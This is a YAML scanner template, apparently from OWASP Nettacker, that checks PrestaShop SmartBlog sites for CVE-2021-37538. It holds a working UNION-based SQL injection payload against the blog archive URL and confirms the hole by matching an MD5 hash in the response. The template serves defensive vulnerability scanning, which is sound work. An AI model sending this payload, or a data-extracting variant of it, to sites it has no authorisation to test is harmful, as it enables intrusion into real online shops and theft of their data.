info:
  name: prestashop_cve_2021_37538_vuln
  author: OWASP Nettacker Team
  severity: 9
  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
  reference: 
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
    - https://blog.sorcery.ie/posts/smartblog_sqli/
  profiles:
    - vuln
    - vulnerability
    - http
    - critical_severity
    - cve2021
    - cve
    - prestashop
    - sqli

payloads:
  - library: http
    steps:
      - method: get
        timeout: 3
        headers:
          User-Agent: "{user_agent}"
        allow_redirects: false
        ssl: false
        url:
          nettacker_fuzzer:
            input_format: "{{schema}}://{target}:{{ports}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"
            prefix: ""
            suffix: ""
            interceptors:
            data:
              schema:
                - "http"
                - "https"
              ports:
                - 80
                - 443
        response:
          condition_type: and
          conditions:
            status_code:
              regex: '200'
              reverse: false
            content:
              regex: c5fe25896e49ddfe996db7508cf00534
              reverse: false
